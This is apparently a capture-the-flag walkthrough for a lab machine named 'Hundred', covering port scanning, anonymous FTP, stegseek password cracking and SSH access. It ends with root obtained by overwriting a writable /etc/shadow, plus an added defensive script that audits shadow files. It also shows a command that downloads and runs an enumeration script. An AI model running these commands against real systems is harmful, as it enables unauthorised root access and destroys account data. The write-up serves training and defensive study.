Hundred

Last updated 1 year ago

When starting the machine, we see the IP of the victim machine.

So I decide to use Nmap to scan for open ports and gather information about the services running on them.

sudo nmap -sS -p- --min-rate 4500 -n -Pn 192.168.18.181
nmap -sCV -p21,22,80 -n -Pn 192.168.18.181 -oN target

And we observe that port 21 (FTP) allows anonymous login. So I decide to log in, since the scan indicates there are files of interest.

Now that we're inside, I decide to download the file users.txt with the following command:

get users.txt

On my local machine I check its contents: it appears to be a wordlist, but at the bottom we can notice a username (hmv).

Later, upon downloading the id_rsa, we see that it's a drawing of a rabbit.

And we observe that id_rsa.pem seems to be a private RSA key.

I set the permissions on the private key and try to log in with it, but it doesn't work.

So, it seemed that the rabbit drawing indicated that the id_rsa was just a "rabbit hole".

I decide to go through port 80 (HTTP).

We can observe a value named 'key' that contains some strange text, and I notice that it is an '.enc' file. We can decrypt it using the RSA private key and OpenSSL.

Decrypting the downloaded file with the private key yields a directory name:

openssl pkeyutl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key
cat key

Since the output says it is there (...), I decide to use Gobuster to check whether there are any subdirectories or files within this directory.

And we come across another id_rsa. So, I download it.

wget http://192.168.18.181/softyhackb4el7dshelldredd/id_rsa

As we can see, it appears to be a private key. Let's see if it works:

Unfortunately, it's asking for a password.

For the next step, we'll need to download the image from the webpage and use steganography techniques to extract information from the image.

wget http://192.168.18.181/logo.jpg

I decide to use Stegseek with the dictionary we obtained earlier from port 21 (FTP).

stegseek logo.jpg users.txt

And we obtain the password that the private key was asking for. So, I manage to access and become the user hmv:

And we obtain the user flag.

There are only two users: hmv and root.

Now let's begin the privilege escalation.

After tinkering for a while with tools like pspy64 and LinPEAS without any success, I decide to use lse.sh (Linux Smart Enumeration), a script designed to display information relevant to the security of the local Linux system and help with privilege escalation.

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
./lse.sh -l1

The -l1 option in the last command makes lse.sh display its information in more detail.

As a result, we see that the /etc/shadow file can be edited.

To change the root password in the /etc/shadow file, we will use the following commands:

openssl passwd

This generates the password in hash format.

Since I can't edit the /etc/shadow file directly with a text editor like nano, we have to overwrite the entire file. So our only option is to execute the following command:

echo root:e84V4zPcic2M2:18844:0:99999:7::: > /etc/shadow

We then switch to the root user with the password we set.

And there we go: we obtain the root flag and have successfully finished hacking this machine.
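As an added defender-side example (not part of the original writeup), the following Python script audits a shadow file for the three things this escalation leaves behind: an /etc/shadow that is group- or world-accessible, a legacy 13-character DES crypt hash like the one generated above, and accounts that are still listed in /etc/passwd but vanished from the overwritten /etc/shadow. The sample shadow and passwd contents and the 0666 mode are constructed for the demonstration.

```python
import re
import stat
# Hash prefix -> algorithm, per crypt(5). A bare 13-char [./0-9A-Za-z] string is legacy DES crypt.
PREFIXES = {"1": "md5", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
            "5": "sha256", "6": "sha512", "7": "scrypt", "y": "yescrypt"}
DES_RE = re.compile(r"[./0-9A-Za-z]{13}")

def hash_algorithm(field):
    """Classify the password field of a shadow entry."""
    if field in ("", "*") or field.startswith("!"):
        return "locked"                     # no usable password
    if field.startswith("$"):
        return PREFIXES.get(field.split("$")[1], "unknown")
    return "des" if DES_RE.fullmatch(field) else "unknown"

def audit_shadow(shadow_text, passwd_text, mode):
    """Return (severity, detail) findings for a shadow file's permissions and contents."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH | stat.S_IROTH):
        findings.append(("critical", f"shadow mode {mode:04o} is group/world accessible; expect 0640 or stricter"))
    shadow_users = set()
    for lineno, line in enumerate(shadow_text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:                # shadow(5): exactly nine colon-separated fields
            findings.append(("high", f"line {lineno}: expected 9 fields, got {len(fields)}"))
            continue
        user, pw = fields[0], fields[1]
        shadow_users.add(user)
        if hash_algorithm(pw) == "des":
            findings.append(("high", f"{user}: legacy 13-char DES crypt hash (56-bit key, 8-char password limit)"))
    # Every passwd account with an 'x' password field must have a shadow entry; a missing one
    # is exactly what a single-line 'echo ... > /etc/shadow' overwrite leaves behind.
    for line in passwd_text.splitlines():
        if line.strip():
            user, pw = line.split(":")[:2]
            if pw == "x" and user not in shadow_users:
                findings.append(("high", f"{user}: listed in passwd but missing from shadow"))
    return findings

# Constructed sample: the shadow file as left by the writeup's overwrite (root only, DES hash)
# and a passwd file that still lists the hmv account; mode 0666 stands in for "can be edited".
SAMPLE_SHADOW = "root:e84V4zPcic2M2:18844:0:99999:7:::\n"
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "hmv:x:1000:1000:hmv:/home/hmv:/bin/bash\n")
if __name__ == "__main__":
    for sev, detail in audit_shadow(SAMPLE_SHADOW, SAMPLE_PASSWD, 0o666):
        print(f"[{sev}] {detail}")
```

Run against the real files with `os.stat("/etc/shadow").st_mode & 0o777` as the mode argument; an empty result means permissions, hash algorithms and passwd/shadow consistency all check out.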

Screenshots referenced in this writeup (not reproduced here): IP of the victim machine; Nmap scan; inside port 21 (FTP); users.txt file; id_rsa is a rabbit; id_rsa.pem file; homepage; source code of the homepage; directory and file enumeration with Gobuster; we obtain the id_rsa; we use Stegseek; we are the user hmv; critical file can be edited: /etc/shadow; we are root now.